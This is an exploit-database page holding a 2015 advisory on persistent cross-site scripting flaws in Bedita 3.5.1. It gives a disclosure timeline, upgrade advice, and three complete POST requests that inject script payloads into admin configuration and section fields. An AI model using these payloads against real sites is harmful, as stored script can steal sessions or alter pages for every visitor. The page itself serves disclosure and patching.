header-logo
Suggest Exploit
vendor:
Bedita
by:
Sébastien Morin
7.5
CVSS
HIGH
XSS
79
CWE
Product Name: Bedita
Affected Version From: 3.5.2001
Affected Version To: 3.5.2001
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2015

Bedita 3.5.1 XSS vulnerabilites

Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the 'cfg[projectName]', 'data[stats_provider_url]' and 'data[description]' parameters. This could allow malicious users to create a specially crafted POST request that would execute arbitrary code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.

Mitigation:

Upgrade to version 3.6 or later
Source

Exploit-DB raw data:

########################################################################################

# Title: Bedita 3.5.1 XSS vulnerabilites 
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications

########################################################################################

===================
Introduction:
===================

BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.

(http://en.wikipedia.org/wiki/BEdita)

########################################################################################

===================
Report Timeline:
===================

2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor reponse
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release


########################################################################################

===================
Technical details:
===================


Persistent XSS:
===============

Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.


Exploits Examples:


1)cfg[projectName] parameter:

 	POST http://127.0.0.1/bedita/index.php/admin/saveConfig 
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]


2) data[stats_provider_url] parameter:

 	POST http://127.0.0.1/bedita/index.php/areas/saveArea
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]


3) data[description] parameter:

	POST http://127.0.0.1/bedita/index.php/areas/saveSection
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bdescription%5D=&lt;/textarea&gt;<script>alert(123)</script>[...]

########################################################################################

Navigation

Suggest Exploit

Services By CQR